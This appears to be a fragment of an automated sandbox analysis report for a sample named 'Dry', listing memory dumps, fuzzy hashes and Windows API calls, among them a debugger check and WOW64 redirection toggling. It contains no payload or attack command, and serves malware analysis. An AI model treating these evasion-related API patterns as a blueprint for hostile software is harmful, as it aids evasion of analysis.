                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                    • String ID: X
                                                                                                                                                                                                                                                                                    • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                    • Opcode ID: 215c08cbcdefc413430a1b0bd37193710245400136f0940eaeaead4cc6f28340
                                                                                                                                                                                                                                                                                    • Instruction ID: f596e60426ba5bac6f270ec65e5b490adb7c028ecb85de6a171191935cbce471
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 215c08cbcdefc413430a1b0bd37193710245400136f0940eaeaead4cc6f28340
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB218171A042989BDB01DFA5DC09BEE7BF8AF49304F008059E549A7241DFB59A898F61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AE3A3C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3060519891c0da1f51524201437cd4fbf96ecd2dbe1c13dbcb9ef4ad6eedc1bd
                                                                                                                                                                                                                                                                                    • Instruction ID: fa1ca6b0c164fbc8d3a6e62cf031bc3b51e338c15d596d2c5f687138eaed29f7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3060519891c0da1f51524201437cd4fbf96ecd2dbe1c13dbcb9ef4ad6eedc1bd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C231A5715043019FD721DF25D888797BBF8FB48348F000A2EE6D997241E7B5A988CB52
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00AE333D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AE32FB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AE3312
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00AE3368,?), ref: 00AE33BB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00AE3368,?), ref: 00AE33CE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00BB2418,00BB2400,?,?,?,?,?,?,00AE3368,?), ref: 00AE343A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00BB2418,?,?,?,?,?,?,?,00AE3368,?), ref: 00AE34BB
                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00AE3377
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 36ac63c685a28f0ce7773dc87515554be1a728fbe148a09415aff33afbf77065
                                                                                                                                                                                                                                                                                    • Instruction ID: 9575a4aad19fc1c91db1f0c3017bb4c86430dc332e975134e57d028e4145a058
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36ac63c685a28f0ce7773dc87515554be1a728fbe148a09415aff33afbf77065
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F05E325543849FE711AF61ED0FB253BE4AB00719F044A19B6098B1E2CFFA95908B48
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00AECEEE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d4395b45ffe20d7e31f530444f71f70df11e709736a03f2cdbd049555ee53ac3
                                                                                                                                                                                                                                                                                    • Instruction ID: c1bc1b3ce707ef209d1e667756fd1f08d0be11cb3f84fe35cef2d4da7b8bf0c0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4395b45ffe20d7e31f530444f71f70df11e709736a03f2cdbd049555ee53ac3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D32F375A00249DFCB20CF59C885ABEB7F9FF44360F288499E916AB251C775ED42CB90
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b8b13838ea9611bb4f5a224b0436d608fb6302d4c4391c104507fb6ab98bf440
                                                                                                                                                                                                                                                                                    • Instruction ID: 27eeedc0876ecefb762fc2ba4dcb9c35206c9ea1d1087af0ce5c864cc937704b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8b13838ea9611bb4f5a224b0436d608fb6302d4c4391c104507fb6ab98bf440
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06D17B74A04209EFCB14EF98C8919AEBBF5FF48314F244199E915AB391DB35AD81CF90
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 7cfe861eac18ef02fd89f7fc881a441b86d48a48991da2bbb69249a0927c6fa3
                                                                                                                                                                                                                                                                                    • Instruction ID: 11ea1f956a986d118e4b0df68ddc742002a88b8a8187ace9d9633225b2f15cf0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cfe861eac18ef02fd89f7fc881a441b86d48a48991da2bbb69249a0927c6fa3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB51A375B04209AFDB20DF68C841AB97FE1EB85364F1981E8F8189B7D1D771AD42CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00B4FCCE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a635c8388d60e05b5885b02e3485d5b8ff3aa595cf47a8774342f5636e7cd9ab
                                                                                                                                                                                                                                                                                    • Instruction ID: 9719b0de65cbad227100cf30e7bad3a402331d900216ab436096c9414401e5ee
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a635c8388d60e05b5885b02e3485d5b8ff3aa595cf47a8774342f5636e7cd9ab
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E41A77690020AAFCB11EF68C8819BEB7F9EF44314B20457EE51697251EB70DF45DB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE668B,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE664A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AE665C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE663E: FreeLibrary.KERNEL32(00000000,?,?,00AE668B,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE666E
                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE66AB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B25657,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE6610
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AE6622
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE6607: FreeLibrary.KERNEL32(00000000,?,?,00B25657,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE6635
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c24409a024185a239d60eca1a72c60dfb94fade9245bfec37763f74c8d72f470
                                                                                                                                                                                                                                                                                    • Instruction ID: 7f4f161ab4b26bff52d1d65f5642f65bf346ffd35aa81c2355273c671e481586
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c24409a024185a239d60eca1a72c60dfb94fade9245bfec37763f74c8d72f470
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30112372610245AACF28AB31CE02BAD7BF19F60790F108C2DF452AA1C2EE75DA059B50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9d4c5957aa601738e69e2741da0658eb46caac04eeefd0b219e42e97af8d7c1e
                                                                                                                                                                                                                                                                                    • Instruction ID: e9f86c90524ddb310ef8fb5363f44df472d2a2bdc1bf923c3fb04c4dbfd050be
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d4c5957aa601738e69e2741da0658eb46caac04eeefd0b219e42e97af8d7c1e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F111487190410AAFCB05DF58E9409DA7BF5FF48300F1040A9F808AB311DA31EE118B64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B14FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00B1319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00B15031
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B153DF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                    • Instruction ID: 9615ac62605334569892538e09f259e9a616275a2a351016292db4e4264bea29
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F0126B2200304ABE3318F69E88199AFBE9EBC5370FA5056DE59583280EB70A945C774
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                    • Instruction ID: d8d12dedece39f11e0ed15fc4f87cfb4ee0aa309008e12500683b2f583d2a1ae
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30F0283250062096D6313A6ADC05BAA3BD8DF42374F114FE6F535932D1EF70E84286D2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 08755545acd0858eed81ce7ccf5a2a28b8455995394f04f7eef10020ba82947e
                                                                                                                                                                                                                                                                                    • Instruction ID: 501e8f324a8ddd8e106df00cbaebf9fedbf60ae824a25b0b6fd92f1433acc38a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08755545acd0858eed81ce7ccf5a2a28b8455995394f04f7eef10020ba82947e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77F0C8B36117056ED7149F29D806BA7BFA8EB44360F10852AFA19CF5D1DB31E5108BA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00B5F987
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7c2a543c4a96b25bdbffc8c5324436206cfd5a7116a61445579eaec716c99274
                                                                                                                                                                                                                                                                                    • Instruction ID: 839bbfde9dec101ad16fe9bc58f2351cdbd3f461009965ce1d23f2059b84596e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c2a543c4a96b25bdbffc8c5324436206cfd5a7116a61445579eaec716c99274
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F08172600105BFCB01EBA5DC46E9EBBFCEF49710F004094F505AB261DA70EA45C750
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00B1319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00B15031
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
